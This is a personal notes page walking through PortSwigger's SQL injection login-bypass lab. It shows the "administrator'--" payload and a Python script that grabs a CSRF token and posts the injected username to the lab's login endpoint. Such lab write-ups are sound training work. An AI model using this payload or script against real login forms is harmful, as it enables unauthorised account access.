πŸ‘¨β€πŸ’»
Jawad's Notes
  • πŸ‘¨β€πŸ«INFOSEC
    • πŸ•ΈοΈWeb
      • Burp Suite: Setting Foxyproxy
      • XSS
      • Wappalyzer
      • Directory Traversal
      • LFI
        • PHP Wrappers
        • RFI
      • Reverse Shell
        • Command Injection Quick Tips
      • File Upload
      • WPScan
      • SQL Injection
        • Schemas
        • SQLmap
        • MSSQL
        • MySQL
        • PostgreSQL
    • πŸ”§Tools
      • Whois
      • DNSRecon
      • DNSenum
      • nslookup
      • Netcat
        • Powercat
      • Nmap
        • Nmap Scripting Engine
        • Test-NetConnection
        • Grep
      • Server Message Block (SMB)
      • SNMP
      • SMTP
      • ExifTool
      • Search Engine Hacking
      • Source Control Hacking
      • Nessus
      • Canarytokens
      • Qualys SSL Server Test
      • Security Headers
      • theHarvester
      • Shodan
      • Gobuster
        • Dirb
      • Searchsploit
      • Password Cracking
        • Hashcat
        • John The Ripper
        • Hydra
        • hashID
        • CPU vs GPU
    • 🐧Linux
      • Symbols
      • cat
      • curl
      • openvpn
      • tcpdump
      • Remote Desktop
      • SmbShare
      • Tmux
      • Convert Windows-style line endings (CRLF) to Unix-style (LF)
      • SSH
    • πŸ–₯️Macros in Office
    • 🍎Enhancing Your MacOS Terminal Experience
    • 🚩CTF
      • SQL Injection
        • WHERE clause allowing retrieval of hidden data
        • Allowing login bypass
        • UNION attack, determining the number of columns returned by the query
        • UNION attack, finding a column containing text
        • UNION attack, retrieving data from other tables
        • UNION attack, retrieving multiple values in a single column
        • Querying the database type and version on Oracle
Powered by GitBook
On this page
  1. INFOSEC
  2. CTF
  3. SQL Injection

Allowing login bypass

PreviousWHERE clause allowing retrieval of hidden dataNextUNION attack, determining the number of columns returned by the query

Last updated 1 year ago

Lab #2 by PortSwigger Web Security Academy: https://portswigger.net/web-security/sql-injection/lab-login-bypass

Description

This lab contains a SQL injection vulnerability in the login function.

To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Steps

Trying to login by using a single quote (') as the username, returns an internal server error, demonstrating that the app is vulnerable.

By intercepting the Login POST request and appending '-- to the administrator username, we can bypass the remaining part of the query that checks the password.

And we’re in!

Let’s script the solution in Python.

It’s a POST request that expects three parameters: csrf, username, and password.

import requests  
import sys  
import urllib3  
from bs4 import BeautifulSoup  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}  
  
def get_csrf_token(session, url):  
	response = session.get(url, verify=False, proxies=proxies)  
	soup = BeautifulSoup(response.text, 'html.parser')  
	# getting csrf from html input element  
	return soup.find("input")['value']  
  
  
if __name__ == "__main__":  
	try:  
		url = sys.argv[1].strip()  
		username = sys.argv[2].strip()  
	except IndexError:  
		print('Usage: %s <url> <username>, e.g www.example.com "1=1"' % sys.argv[0]) 
		sys.exit(-1)  
  
session = requests.Session()  
  
#password is not important knowing that Auth is bypassed from an SQLi in ther username parameter  
data = {"csrf": get_csrf_token(session, url), "username": username, "password": "randomstring"}  
response = session.post(url, data=data, verify=False, proxies=proxies)  
  
# Congratulations message will show up only after solving the lab manually.  
if "Congratulations" in response.text:  
	print("it worked.")  
else:  
	print("Didn't work.")
	

Testing the Python script:

> python3 sqli-lab02.py "https://0ab000eb0409a6428036c6eb00f500b7.web-security-academy.net/login" "administrator'--"

It worked! We can also validate it through Burp.

πŸ‘¨β€πŸ«
🚩